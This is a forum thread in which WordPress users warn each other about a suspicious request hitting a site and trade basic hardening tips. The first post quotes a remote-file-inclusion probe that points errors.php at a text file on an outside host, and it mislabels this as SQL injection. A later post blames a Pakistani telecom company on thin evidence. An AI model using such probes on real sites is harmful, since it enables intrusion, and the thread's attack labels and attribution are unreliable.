This is the closest topic I could find, if its the wrong place, then please move accordingly. I have noticed several times over the last few days that one of my sites has been repeatedly visited by someone using a random string, which definitely made me think that someone is trying to SQL inject the site. The string ended in "/errors.php?error=http://40-crew.com/media/id1.txt??" I dont know much about this kind of thing apart from how to repeatedly ban IP's from WordPress as they spawn up (probably using TOR), but thought I would share this with everyone, jsut so that everyone who uses WordPress can be aware of this one.
Thanks for the aware. -. Keep your Wordpress updated. -. Don't use "nulled" plugins or strange themes from warez sites Use plugins as: http://wordpress.org/extend/plugins/wp-security-scan/ http://wordpress.org/extend/plugins/tac/
From the readong around that I have done, it seems like this is an exploit that has been around for a very long tome, hacks been successful since back as far as 2007 using SQL injection. There was a group based in Pakistan that were known for doing this to people's blogs, they would also delete the 1 account from the mySQL database, and completely replace the WordPress files with outdated files as well. Was an easy fix, buit it seems that there are reports of the same people being at it again. Every hack that I have read about that fits this description and string matches what a group who always trace back to the Pakistani Telecommunications Company. They haven't been doing much for the past few years, but they seem to have re surfaced over the past 3 weeks. I have added some extra security to my WP, but yeah, last time these guys started messing with people, a hell of alot of people lost their blogs, and had to do a hell of alot of work. If these guys are back, then it may be a problem for those who are using wordpress. As a precaution, I have temporarily banned all IP addresses from the Pakistani Telecommunications company, until I can make sure that my blog is locked up extremely tight. A few very brief precautions: 1. Make sure that your WP is updated. 2. Check your CHMOD permissions 3. Change your mySQL prefix so that it differs from wp_ Make it cryptic, and treat it like a password 4. Check that your server is secure. 5. Dont upload any files from your computer for plugins unless your computer is protected. Just a few pointers.